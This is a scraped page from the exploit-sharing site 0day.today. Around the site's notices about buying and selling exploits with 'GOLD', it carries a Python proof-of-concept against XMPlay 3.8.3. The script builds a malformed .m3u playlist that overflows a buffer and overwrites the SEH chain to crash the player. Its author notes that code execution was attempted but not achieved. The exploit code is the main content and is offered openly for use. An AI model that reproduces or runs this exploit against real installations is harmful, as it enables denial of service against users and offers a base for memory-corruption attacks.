0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
XMPlay 3.8.3 - .m3u Denial of Service Exploit
# Exploit Title: XMPlay 3.8.3 - '.m3u' Denial of Service (PoC) # Exploit Author: s7acktrac3 # Vendor Homepage: https://www.xmplay.com/ # Software Link: https://support.xmplay.com/files_view.php?file_id=676 # Version: 3.8.3 (latest) # Tested on: Windows XP/7/8 # CVE : N/A # # Lauch XMPlay and either drag xmplay.m3u into the XMPlay window or # File Menu-> select winamp.m3u and Crash! # -*- coding: utf-8 -*- # # Note: Successfully can overwrite the SEH chain & control the handler and nSEH # but the address get mangled & unreconizable, for this reason could not turn into # code execution. import struct from struct import pack file_data = "#EXTM3U\n\r" file_data += "#EXTINF:200,Sleep Away\n\r" file_data += "http://test." max_size = 3000 - 1 nseh_offset = 656 seh_overwrite = pack("<L", 0x00402450) payload = "A" * nseh_offset # padding for nseh payload += "BBBB" # nseh payload += seh_overwrite # seh #padding for rest of payload - pipe "|" is needed somehow to force crash payload += "D" *(max_size - len(payload)) + "|" print "[+] Creating .m3u file with payload size: "+ str(len(payload)) exploit = file_data + payload file = open('xmplay.m3u','w'); file.write(exploit); file.close(); print "[+] Done creating the file" # 0day.today [2024-12-24] #